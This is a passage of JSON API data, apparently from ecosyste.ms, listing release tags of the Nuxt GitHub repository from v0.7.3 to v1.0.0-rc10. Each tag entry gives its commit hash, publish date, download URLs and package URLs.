ed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2